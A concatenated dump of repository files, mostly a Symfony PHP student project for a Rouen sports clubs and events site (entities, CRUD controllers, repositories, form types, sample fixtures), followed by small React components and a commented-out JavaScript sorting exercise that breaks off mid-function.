public function setStatus($status)
{
$this->status = $status;
return $this;
}
/**
* Get status.
*
* @return string
*/
public function getStatus()
{
return $this->status;
}
/**
* Set telephone.
*
* @param integer $telephone
*
* @return Club
*/
public function setTelephone($telephone)
{
$this->telephone = $telephone;
return $this;
}
/**
* Get telephone.
*
* @return integer
*/
public function getTelephone()
{
return $this->telephone;
}
/**
* Set email.
*
* @param string $email
*
* @return Club
*/
public function setEmail($email)
{
$this->email = $email;
return $this;
}
/**
* Get email.
*
* @return string
*/
public function getEmail()
{
return $this->email;
}
}
<file_sep>/mrsport/src/MrsportBundle/Controller/SportsController.php
<?php
namespace MrsportBundle\Controller;
use MrsportBundle\Entity\Sports;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
/**
* Sport controller.
*
*/
class SportsController extends Controller
{
/**
* Lists all sport entities.
*
*/
public function indexAction()
{
$em = $this->getDoctrine()->getManager();
$sports = $em->getRepository('MrsportBundle:Sports')->findAll();
return $this->render('sports/index.html.twig', array(
'sports' => $sports,
));
}
/**
* Creates a new sport entity.
*
*/
public function newAction(Request $request)
{
$sport = new Sports();
$form = $this->createForm('MrsportBundle\Form\SportsType', $sport);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$em->persist($sport);
$em->flush();
return $this->redirectToRoute('sports_show', array('id' => $sport->getId()));
}
return $this->render('sports/new.html.twig', array(
'sport' => $sport,
'form' => $form->createView(),
));
}
/**
* Finds and displays a sport entity.
*
*/
public function showAction(Sports $sport)
{
$deleteForm = $this->createDeleteForm($sport);
return $this->render('sports/show.html.twig', array(
'sport' => $sport,
'delete_form' => $deleteForm->createView(),
));
}
/**
* Displays a form to edit an existing sport entity.
*
*/
public function editAction(Request $request, Sports $sport)
{
$deleteForm = $this->createDeleteForm($sport);
$editForm = $this->createForm('MrsportBundle\Form\SportsType', $sport);
$editForm->handleRequest($request);
if ($editForm->isSubmitted() && $editForm->isValid()) {
$this->getDoctrine()->getManager()->flush();
return $this->redirectToRoute('sports_edit', array('id' => $sport->getId()));
}
return $this->render('sports/edit.html.twig', array(
'sport' => $sport,
'edit_form' => $editForm->createView(),
'delete_form' => $deleteForm->createView(),
));
}
/**
* Deletes a sport entity.
*
*/
public function deleteAction(Request $request, Sports $sport)
{
$form = $this->createDeleteForm($sport);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$em->remove($sport);
$em->flush();
}
return $this->redirectToRoute('sports_index');
}
/**
* Creates a form to delete a sport entity.
*
* @param Sports $sport The sport entity
*
* @return \Symfony\Component\Form\Form The form
*/
private function createDeleteForm(Sports $sport)
{
return $this->createFormBuilder()
->setAction($this->generateUrl('sports_delete', array('id' => $sport->getId())))
->setMethod('DELETE')
->getForm()
;
}
}
<file_sep>/mrsport/src/MrsportBundle/Repository/evenementsRepository.php
<?php
namespace MrsportBundle\Repository;
/**
* evenementsRepository
*
* This class was generated by the Doctrine ORM. Add your own custom
* repository methods below.
*/
class evenementsRepository extends \Doctrine\ORM\EntityRepository
{
public function findlastfive()
{
$qb = $this->createQueryBuilder('e')
->orderBy('e.id', 'DESC')
->getQuery()->setMaxResults(5);
return $qb->execute();
}
public function getEventWithStatus($status = 'valide')
{
$qb = $this->createQueryBuilder('e')
->where("e.status = :identifier")
->orderBy('e.date', 'ASC')
->setParameter(':identifier', $status)
->getQuery();
return $qb->execute();
}
}
<file_sep>/mrsport/README.md
mrsport
=======
A Symfony project created on May 31, 2018, 12:11 pm.
<file_sep>/mrsport/src/MrsportBundle/Controller/DefaultController.php
<?php
namespace MrsportBundle\Controller;
use MrsportBundle\Entity\Club;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use MrsportBundle\Entity\User;
class DefaultController extends Controller
{
public function indexAction()
{
return $this->render('@Mrsport/Default/index.html.twig');
}
public function back_officeAction()
{
return $this->render('@Mrsport/Back_office/index.html.twig');
}
public function basket_resultat_classementAction()
{
return $this->render('@Mrsport/Basket/basket_resultat_classement.html.twig');
}
public function basket_agendaAction()
{
return $this->render('@Mrsport/Basket/basket_agenda.html.twig');
}
public function basketAction()
{
return $this->render('@Mrsport/Basket/basket.html.twig');
}
public function footballAction()
{
return $this->render('@Mrsport/Football/football.html.twig');
}
public function football_agendaAction()
{
return $this->render('@Mrsport/Football/football_agenda.html.twig');
}
public function football_resultat_classementAction()
{
return $this->render('@Mrsport/Football/football_resultat_classement.html.twig');
}
public function liste_clubAction()
{
return $this->render('@Mrsport/Club/liste_club.html.twig');
}
public function liste_club_footballAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubsfootball = $em->getRepository(Club::class)->findBy(
array( 'sports' => 1)
);
return $this->render('@Mrsport/Club/liste_club_football.html.twig',
array(
'clubs' => $clubsfootball
));
}
public function liste_club_basketAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubsbasket = $em->getRepository(Club::class)->findBy(
array( 'sports' => 4)
);
return $this->render('@Mrsport/Club/liste_club_basket.html.twig',
array(
'clubs' => $clubsbasket
));
}
public function liste_club_rugbyAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubsrugby = $em->getRepository(Club::class)->findBy(
array( 'sports' => 2)
);
return $this->render('@Mrsport/Club/liste_club_rugby.html.twig',
array(
'clubs' => $clubsrugby
));
}
public function liste_club_hockeyAction()
{
// requete
$em = $this->getDoctrine()->getManager();
$clubshockey = $em->getRepository(Club::class)->findBy(
array( 'sports' => 3)
);
return $this->render('@Mrsport/Club/liste_club_hockey.html.twig',
array(
'clubs' => $clubshockey
));
}
public function single_clubAction()
{
return $this->render('@Mrsport/Club/single_club.html.twig');
}
public function contactAction()
{
return $this->render('@Mrsport/Contact/contact.html.twig');
}
public function hockey_agendaAction()
{
return $this->render('@Mrsport/Hockey/hockey_agenda.html.twig');
}
public function hockey_resultat_classementAction()
{
return $this->render('@Mrsport/Hockey/hockey_resultat_classement.html.twig');
}
public function hockeyAction()
{
return $this->render('@Mrsport/Hockey/hockey.html.twig');
}
public function rugbyAction()
{
return $this->render('@Mrsport/Rugby/rugby.html.twig');
}
public function rugby_resultat_classementAction()
{
return $this->render('@Mrsport/Rugby/rugby_resultat_classement.html.twig');
}
public function rugby_agendaAction()
{
return $this->render('@Mrsport/Rugby/rugby_agenda.html.twig');
}
public function evenementAction()
{
return $this->render('@Mrsport/Evenement/evenement.html.twig');
}
public function dashboardAction()
{
// doctrine
$em = $this->getDoctrine()->getManager();
$users = $em->getRepository('MrsportBundle:User')->findlastfive();
$evenements = $em->getRepository('MrsportBundle:Evenements')->findlastfive();
$clubs = $em->getRepository('MrsportBundle:Club')->findlastfive();
return $this->render('@Mrsport/admin/dashboard.html.twig',array(
'users' => $users,
'evenements' => $evenements,
'clubs' => $clubs,
));
}
public function listing_usersAction()
{
return $this->render('@Mrsport/admin/listing_users.html.twig');
}
public function validation_clubAction()
{
return $this->render('@Mrsport/admin/validation_club.html.twig');
}
public function validation_evenementAction()
{
return $this->render('@Mrsport/admin/validation_evenement.html.twig');
}
}
<file_sep>/mrsport/src/MrsportBundle/Repository/UserRepository.php
<?php
namespace MrsportBundle\Repository;
/**
* sportsRepository
*
* This class was generated by the Doctrine ORM. Add your own custom
* repository methods below.
*/
class UserRepository extends \Doctrine\ORM\EntityRepository
{
public function findlastfive()
{
$qb = $this->createQueryBuilder('u')
->orderBy('u.lastLogin', 'DESC')
->getQuery()->setMaxResults(5);
return $qb->execute();
}
}
<file_sep>/mrsport/src/MrsportBundle/MrsportBundle.php
<?php
namespace MrsportBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class MrsportBundle extends Bundle
{
}
<file_sep>/mrsport/src/MrsportBundle/Form/ClubType.php
<?php
namespace MrsportBundle\Form;
use Symfony\Component\Form\AbstractType;
use Symfony\Component\Form\FormBuilderInterface;
use Symfony\Component\OptionsResolver\OptionsResolver;
use Symfony\Component\Form\Extension\Core\Type\DateType;
use Symfony\Bridge\Doctrine\Form\Type\EntityType;
use Symfony\Component\Form\Extension\Core\Type\TextType;
use MrsportBundle\Entity\Sports;
class ClubType extends AbstractType
{
/**
* {@inheritdoc}
*/
public function buildForm(FormBuilderInterface $builder, array $options)
{
$builder
->add('name',TextType::class, [
"required" => true
])
->add('president', TextType::class, [
"required" => true
])
->add('entraineur', TextType::class, [
"required" => true
])
->add('fondation',DateType::class,array(
'widget' => 'choice',
'format' => 'y-M-d',
))
->add('couleur', TextType::class, [
"required" => true
])
->add('stade', TextType::class, [
"required" => true
])
->add('siteweb', TextType::class, [
"required" => true
])
->add('telephone', TextType::class, [
"required" => true
])
->add('email', TextType::class, [
"required" => true
])
->add('sports',EntityType::class, array(
'class' => Sports::class,
// 'choice_label' => 'name',
'multiple' => false,
'expanded' => true,
//'mapped' => false
//'multiple' => true,
));
}/**
* {@inheritdoc}
*/
public function configureOptions(OptionsResolver $resolver)
{
$resolver->setDefaults(array(
'data_class' => 'MrsportBundle\Entity\Club'
));
}
/**
* {@inheritdoc}
*/
public function getBlockPrefix()
{
return 'mrsportbundle_club';
}
}
<file_sep>/mrsport/src/MrsportBundle/Entity/Evenements.php
<?php
namespace MrsportBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* evenements
*
* @ORM\Table(name="mrs_evenements")
* @ORM\Entity(repositoryClass="MrsportBundle\Repository\evenementsRepository")
*/
class Evenements
{
/**
* @var int
*
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="AUTO")
*/
private $id;
/**
* @var string
*
* @ORM\Column(name="name", type="string")
*/
private $name;
/**
* @var date
*
* @ORM\Column(name="date", type="date")
*/
private $date;
/**
* @var time
*
* @ORM\Column(name="time", type="time")
*/
private $time;
/**
* @var string
*
* @ORM\Column(name="adresse", type="string")
*/
private $adresse;
/**
* @var string
*
* @ORM\Column(name="ville", type="string")
*/
private $ville;
/**
* @var description
*
* @ORM\Column(name="description", type="text", length= 500)
*/
private $description;
/**
* @var string
*
* @ORM\Column(name="telephone", type="string", length=50,nullable=true)
*/
private $telephone;
/**
* @var string
*
* @ORM\Column(name="email", type="string", length= 100,nullable=true)
*/
private $email;
/**
* @var status
*
* @ORM\Column(name="status", columnDefinition="ENUM('valide','invalide','new')")
*/
private $status;
/**
* @ORM\ManyToOne(targetEntity="MrsportBundle\Entity\Sports")
* @ORM\JoinColumn(nullable=true)
*/
private $sports;
/**
* Get id.
*
* @return int
*/
public function getId()
{
return $this->id;
}
/**
* Set date.
*
* @param \DateTime $date
*
* @return evenements
*/
public function setDate($date)
{
$this->date = $date;
return $this;
}
/**
* Get date.
*
* @return \DateTime
*/
public function getDate()
{
return $this->date;
}
/**
* Set time.
*
* @param \DateTime $time
*
* @return evenements
*/
public function setTime($time)
{
$this->time = $time;
return $this;
}
/**
* Get time.
*
* @return \DateTime
*/
public function getTime()
{
return $this->time;
}
/**
* Set adresse.
*
* @param string $adresse
*
* @return evenements
*/
public function setAdresse($adresse)
{
$this->adresse = $adresse;
return $this;
}
/**
* Get adresse.
*
* @return string
*/
public function getAdresse()
{
return $this->adresse;
}
/**
* Set description.
*
* @param string $description
*
* @return evenements
*/
public function setDescription($description)
{
$this->description = $description;
return $this;
}
/**
* Get description.
*
* @return string
*/
public function getDescription()
{
return $this->description;
}
/**
* Set sports.
*
* @param \MrsportBundle\Entity\Sports $sports
*
* @return evenements
*/
public function setSports(\MrsportBundle\Entity\Sports $sports)
{
$this->sports = $sports;
return $this;
}
/**
* Get sports.
*
* @return \MrsportBundle\Entity\Sports
*/
public function getSports()
{
return $this->sports;
}
/**
* Set ville.
*
* @param string $ville
*
* @return Evenements
*/
public function setVille($ville)
{
$this->ville = $ville;
return $this;
}
/**
* Get ville.
*
* @return string
*/
public function getVille()
{
return $this->ville;
}
/**
* Set name.
*
* @param string $name
*
* @return Evenements
*/
public function setName($name)
{
$this->name = $name;
return $this;
}
/**
* Get name.
*
* @return string
*/
public function getName()
{
return $this->name;
}
/**
* Set status.
*
* @param string $status
*
* @return Evenements
*/
public function setStatus($status)
{
$this->status = $status;
return $this;
}
/**
* Get status.
*
* @return string
*/
public function getStatus()
{
return $this->status;
}
/**
* Set telephone.
*
* @param integer $telephone
*
* @return Evenements
*/
public function setTelephone($telephone)
{
$this->telephone = $telephone;
return $this;
}
/**
* Get telephone.
*
* @return integer
*/
public function getTelephone()
{
return $this->telephone;
}
/**
* Set email.
*
* @param string $email
*
* @return Evenements
*/
public function setEmail($email)
{
$this->email = $email;
return $this;
}
/**
* Get email.
*
* @return string
*/
public function getEmail()
{
return $this->email;
}
}
<file_sep>/mrsport/src/AppBundle/DataFixtures/AppFixtures.php
<?php
// src/DataFixtures/AppFixtures.php
namespace AppBundle\DataFixtures;
// use App\Entity\Product;
use MrsportBundle\Entity\User;
use MrsportBundle\Entity\Sports;
use MrsportBundle\Entity\Club;
use MrsportBundle\Entity\Evenements;
use Doctrine\Bundle\FixturesBundle\Fixture;
use Doctrine\Common\Persistence\ObjectManager;
class AppFixtures extends Fixture
{
public function load(ObjectManager $manager)
{
// USER
$user = new User();
$user->setUsername('weblitzer');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['ROLE_SUPER_ADMIN']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('nathan');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['ROLE_SUPER_ADMIN']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('anais');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['ROLE_SUPER_ADMIN']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('zizou');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>0Vz7moaJtdc0eGTkhCJp/t3sAU/HpB9XWL9KzBpxmcBG');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('serena');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('stephen');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
$user = new User();
$user->setUsername('lebron');
$user->setEmail('<EMAIL>');
$user->setPassword('<PASSWORD>');
$user->setRoles(['']);
$user->setEnabled(true);
$manager->persist($user);
// Sport
$sport = new Sports();
$sport->setName('Football');
$manager->persist($sport);
$sport2 = new Sports();
$sport2->setName('Rugby');
$manager->persist($sport2);
$sport3 = new Sports();
$sport3->setName('Hockey');
$manager->persist($sport3);
$sport4 = new Sports();
$sport4->setName('Basket');
$manager->persist($sport4);
// Club
$date = new \DateTime('1899-07-11');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date);
$club->setCouleur('rouge et blanc');
$club->setStade('Stade Robert-Diochon');
$club->setSiteweb('fcrouen.fr');
$club->setSports($sport);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('invalide');
$manager->persist($club);
$date2 = new \DateTime('2017-06-12');
$club = new Club();
$club->setName('<NAME>ockey élite 76');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME> et <NAME>');
$club->setFondation($date2);
$club->setCouleur('noir et jaune');
$club->setStade('L\'Île Lacroix');
$club->setSiteweb('rouenhockeyelite76.com');
$club->setSports($sport3);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('new');
$manager->persist($club);
$date2 = new \DateTime('2011-06-12');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Noir et blanc');
$club->setStade('stade Jean-Mermoz');
$club->setSiteweb('rouen-normandie-rugby.fr');
$club->setSports($sport2);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('new');
$manager->persist($club);
$date2 = new \DateTime('2011-07-01');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Bleu, blanc et orange');
$club->setStade('Kindarena');
$club->setSiteweb('rouenmetrobasket.com');
$club->setSports($sport4);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
$date2 = new \DateTime('2011-07-01');
$club = new Club();
$club->setName('<NAME>');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Rose et noir');
$club->setStade('Stade Stanislas Bilyk');
$club->setSiteweb('https://www.fff.fr/la-vie-des-clubs/183800/infos-cles');
$club->setSports($sport);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
$date2 = new \DateTime('1942-09-01');
$club = new Club();
$club->setName('SSCC BASKET');
$club->setPresident('<NAME>');
$club->setEntraineur('DUBOSC David');
$club->setFondation($date2);
$club->setCouleur('Rose et noir');
$club->setStade('Stade Sotteville-lès-Rouen');
$club->setSiteweb('http://www.sotteville-basket.fr');
$club->setSports($sport4);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
$date2 = new \DateTime('1942-09-01');
$club = new Club();
$club->setName('Association Sportive Rouen Université Club Section Rugby');
$club->setPresident('<NAME>');
$club->setEntraineur('<NAME>');
$club->setFondation($date2);
$club->setCouleur('Vert et noir');
$club->setStade('Stade Mont Saint Aignan');
$club->setSiteweb('http://rugby.asrouenuc.com');
$club->setSports($sport2);
$club->setTelephone('0235806565');
$club->setEmail('<EMAIL>');
$club->setStatus('valide');
$manager->persist($club);
// Evenement
$date3 = '2018-06-12';
$time = '15:30';
$evenement = new Evenements();
$evenement->setName('Rencontre sportives');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('23 rue <NAME>');
$evenement->setDescription('Rencontre sportives');
$evenement->setVille('Soteville-Lès-Rouen');
$evenement->setStatus('valide');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$manager->persist($evenement);
$date3 = '2018-09-18';
$time = '09:30';
$evenement = new Evenements();
$evenement->setName('<NAME>');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('hôtel de ville');
$evenement->setDescription('Marathon');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('valide');
$manager->persist($evenement);
$date3 = '2018-05-01';
$time = '09:30';
$evenement = new Evenements();
$evenement->setName('24h motonautiques');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('quai du Havre');
$evenement->setDescription('24h motonautiques');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('invalide');
$manager->persist($evenement);
$date3 = '2018-06-01';
$time = '08:30';
$evenement = new Evenements();
$evenement->setName('<NAME>');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('quai du Havre');
$evenement->setDescription('triahlon');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('new');
$manager->persist($evenement);
$date3 = '2018-01-01';
$time = '19:00';
$evenement = new Evenements();
$evenement->setName('Zumba');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('Kindarena');
$evenement->setDescription('Zumba');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('new');
$manager->persist($evenement);
$date3 = '2018-06-01';
$time = '13:00';
$evenement = new Evenements();
$evenement->setName('Baseball - European Champion’s Cup');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('Saint Exupéry');
$evenement->setDescription('Championnat d\'Europe de BaseBall');
$evenement->setVille('Rouen');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('valide');
$manager->persist($evenement);
$date3 = '2018-06-10';
$time = '13:00';
$evenement = new Evenements();
$evenement->setName('Coupe UEFA des régions');
$evenement->setDate(\DateTime::createFromFormat('Y-m-d', $date3));
$evenement->setTime(\DateTime::createFromFormat('H:i', $time));
$evenement->setAdresse('Saint-Lô');
$evenement->setDescription('Football - Coupe UEFA des régions');
$evenement->setVille('Saint-Lô');
$evenement->setTelephone('0235806565');
$evenement->setEmail('<EMAIL>');
$evenement->setStatus('valide');
$manager->persist($evenement);
$manager->flush();
}
}<file_sep>/mrsport/src/MrsportBundle/Form/EvenementsType.php
<?php
namespace MrsportBundle\Form;
use Symfony\Component\Form\AbstractType;
use Symfony\Component\Form\FormBuilderInterface;
use Symfony\Component\OptionsResolver\OptionsResolver;
use Symfony\Bridge\Doctrine\Form\Type\EntityType;
use Symfony\Component\Form\Extension\Core\Type\DateType;
use Symfony\Component\Form\Extension\Core\Type\TextType;
use Symfony\Component\Form\Extension\Core\Type\TextareaType;
use MrsportBundle\Entity\Sports;
class EvenementsType extends AbstractType
{
/**
* {@inheritdoc}
*/
public function buildForm(FormBuilderInterface $builder, array $options)
{
$builder
->add('name',TextType::class, [
"required" => true
])
->add('date')
->add('time')
->add('adresse',TextType::class, [
"required" => true
])
->add('ville',TextType::class, [
"required" => true
])
->add('description',TextareaType::class, [
"required" => true
])
->add('telephone', TextType::class, [
"required" => true
])
->add('email', TextType::class, [
"required" => true
])
->add('sports',EntityType::class, array(
'class' => Sports::class,
// 'choice_label' => 'name',
'multiple' => false,
'expanded' => true,
));
}/**
* {@inheritdoc}
*/
public function configureOptions(OptionsResolver $resolver)
{
$resolver->setDefaults(array(
'data_class' => 'MrsportBundle\Entity\Evenements'
));
}
/**
* {@inheritdoc}
*/
public function getBlockPrefix()
{
return 'mrsportbundle_evenements';
}
}
<file_sep>/mrsport/src/MrsportBundle/Repository/clubRepository.php
<?php
namespace MrsportBundle\Repository;
/**
* clubRepository
*
* This class was generated by the Doctrine ORM. Add your own custom
* repository methods below.
*/
class clubRepository extends \Doctrine\ORM\EntityRepository
{
public function findlastfive()
{
$qb = $this->createQueryBuilder('c')
->orderBy('c.id', 'DESC')
->getQuery()->setMaxResults(5);
return $qb->execute();
}
public function getClubWithStatus($status = 'valide')
{
$qb = $this->createQueryBuilder('c')
->where("c.status = :identifier")
->orderBy('c.id', 'ASC')
->setParameter(':identifier', $status)
->getQuery();
return $qb->execute();
}
}
<file_sep>/mrsport/src/MrsportBundle/Controller/EvenementsController.php
<?php
namespace MrsportBundle\Controller;
use MrsportBundle\Entity\Evenements;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
/**
* Evenement controller.
*
*/
class EvenementsController extends Controller
{
/**
* Lists all evenement entities.
*
*/
public function indexAction()
{
$em = $this->getDoctrine()->getManager();
$evenements = $em->getRepository(Evenements::class)->getEventWithStatus('valide');
return $this->render('evenements/index.html.twig', array(
'evenements' => $evenements,
));
}
public function adminEvenementsAction()
{
$em = $this->getDoctrine()->getManager();
$evenements = $em->getRepository('MrsportBundle:Evenements')->findAll();
return $this->render('@Mrsport/admin/validation_evenement.html.twig', array(
'evenements' => $evenements,
));
}
/**
* @Security("has_role('ROLE_USER')")
*
*/
public function newAction(Request $request)
{
$evenement = new Evenements();
$form = $this->createForm('MrsportBundle\Form\EvenementsType', $evenement);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$evenement->setStatus('new');
$em->persist($evenement);
$em->flush();
return $this->redirectToRoute('evenements_show', array('id' => $evenement->getId()));
}
return $this->render('evenements/new.html.twig', array(
'evenement' => $evenement,
'form' => $form->createView(),
));
}
/**
* Finds and displays a evenement entity.
*
*/
public function showAction(Evenements $evenement)
{
$deleteForm = $this->createDeleteForm($evenement);
return $this->render('evenements/show.html.twig', array(
'evenement' => $evenement,
'delete_form' => $deleteForm->createView(),
));
}
/**
* @Security("has_role('ROLE_ADMIN')")
*
*/
public function editAction(Request $request, Evenements $evenement)
{
//die('jkhjk');
$deleteForm = $this->createDeleteForm($evenement);
$editForm = $this->createForm('MrsportBundle\Form\EvenementsType', $evenement);
$editForm->handleRequest($request);
if ($editForm->isSubmitted() && $editForm->isValid()) {
$this->getDoctrine()->getManager()->flush();
return $this->redirectToRoute('evenements_index', array('id' => $evenement->getId()));
}
return $this->render('evenements/edit.html.twig', array(
'evenement' => $evenement,
'edit_form' => $editForm->createView(),
'delete_form' => $deleteForm->createView(),
));
}
/**
* Deletes a evenement entity.
*
*/
public function deleteAction(Request $request, Evenements $evenement)
{
$form = $this->createDeleteForm($evenement);
$form->handleRequest($request);
if ($form->isSubmitted() && $form->isValid()) {
$em = $this->getDoctrine()->getManager();
$em->remove($evenement);
$em->flush();
}
return $this->redirectToRoute('evenements_index');
}
/**
* Creates a form to delete a evenement entity.
*
* @param Evenements $evenement The evenement entity
*
* @return \Symfony\Component\Form\Form The form
*/
private function createDeleteForm(Evenements $evenement)
{
return $this->createFormBuilder()
->setAction($this->generateUrl('evenements_delete', array('id' => $evenement->getId())))
->setMethod('DELETE')
->getForm()
;
}
public function show($id)
{
$evenements = $this->getDoctrine()
->getRepository(Evenements::class)
->find($id);
if (!$evenements) {
throw $this->createNotFoundException(
'No evenements found for id '.$id
);
}
$evenements->setStatus('valide');
$em->persist($evenements);
$em->flush();
return $this->redirectToRoute('dashboard');
}
public function valideAction($id)
{
$em = $this->getDoctrine()->getManager();
$evenements = $this->getDoctrine()->getRepository(Evenements::class)->find($id);
if (!$evenements) {
throw $this->createNotFoundException(
'No evenements found for id '.$id
);
}
$em = $this->getDoctrine()->getManager();
$evenements->setStatus('valide');
$em->persist($evenements);
$em->flush();
return $this->redirectToRoute('mrsport_validation_evenement');
}
public function invalideAction($id)
{
$em = $this->getDoctrine()->getManager();
$evenements = $this->getDoctrine()->getRepository(Evenements::class)->find($id);
if (!$evenements) {
throw $this->createNotFoundException(
'No evenements found for id '.$id
);
}
$evenements->setStatus('invalide');
$em->persist($evenements);
$em->flush();
return $this->redirectToRoute('mrsport_validation_evenement');
}
}
| f13357e79f37ee6a99047036b03cc4e140b525e9 | [
"Markdown",
"PHP"
] | 13 | PHP | AnaisVandenDriessche/MRSPORT | d586108e311efe062dc9db22c43f91729a375661 | 88ca6fe975d16e08ec6c4460bfa8a774ad16455e |
refs/heads/main | <repo_name>youk0160/MERN<file_sep>/React/Functional Components/to-do-list/src/components/Item.jsx
import React from 'react';
const Item = (props)=>{
let itemClass="";
if (props.item.complete) itemClass="text-decoration-line-through";
return(
<>
<li className="list-group-item">
<input type="checkbox" onChange={(event)=>{props.toggleComplete(props.i)}}/>
<span className={itemClass}>{props.item.name}</span>
<button type="submit" onClick={(event)=>{props.deleteItem(props.i)}}>Delete</button>
</li>
</>
)
}
export default Item;<file_sep>/React/Class Components/putting_together/src/App.js
import logo from './logo.svg';
import './App.css';
import Person from './components/Person'
function App() {
return (
<div className="App">
<Person name={"<NAME>"} age={45} hairColor={"Black"}></Person>
<Person name={"<NAME>"} age={88} hairColor={"Brown"}></Person>
</div>
);
}
export default App;
<file_sep>/React/Functional Components/more_forms/src/App.js
import logo from './logo.svg';
import './App.css';
import MoreForm from './components/MoreForm'
function App() {
return (
<div className="App container">
<MoreForm></MoreForm>
</div>
);
}
export default App;
<file_sep>/Fundamentals/algo.js
// // // // arr = [3,1,2,3,7,34,1];
// // // // const sortedArr = arr => {
// // // // for(var x=1; x<arr.length ;x++) {
// // // // while(arr[x-1]>arr[x]) {
// // // // var temp = arr[x-1];
// // // // arr[x-1] = arr[x];
// // // // arr[x] = temp;
// // // // }
// // // // }
// // // // return arr;
// // // // }
// // // // console.log(sortedArr);
// const { resourceLimits } = require("worker_threads");
// // // // function insertionsort(arr){
// // // // for(var i=1; i<arr.length ;i++) {
// // // // var x=i;
// // // // while(arr[x-1]>arr[x]) {
// // // // var temp = arr[x-1];
// // // // arr[x-1] = arr[x];
// // // // arr[x] = temp;
// // // // x -= 1;
// // // // }
// // // // }
// // // // return arr;
// // // // }
// // // // console.log(insertionsort([345,122,423,53,237,134,143]));
// // // // //one function to combine two already sorted array (helper function)
// // // // const combine = (arr1, arr2)=>{
// // // // result = []
// // // // //no nested loops!
// // // // while(arr1.length!=0 && arr2.length!=0) {
// // // // if(arr1[0]<arr2[0]) {
// // // // result.push(arr1.pop());
// // // // }
// // // // else {
// // // // result.push(arr2.pop());
// // // // }
// // // // }
// // // // result=result+arr1+arr2;
// // // // return result;
// // // // }
// // // // //https://www.hackerearth.com/practice/algorithms/sorting/merge-sort/visualize/ with this array [2,4,6,3,5,1,9,0] start at step 74 for the logic if you need a hint
// // // // console.log(combine([2,3,4,6],[0,1,5,9]));
// // // // const merge = (arr)=>{
// // // // //this function will break down one unsorted array into single element arrays and recursively call the combine function to combine the already sorted arrays- hint--> you can use .slice()
// // // // if(arr.length==1) return arr;
// // // // var midpt = Math.floor(arr.length/2);
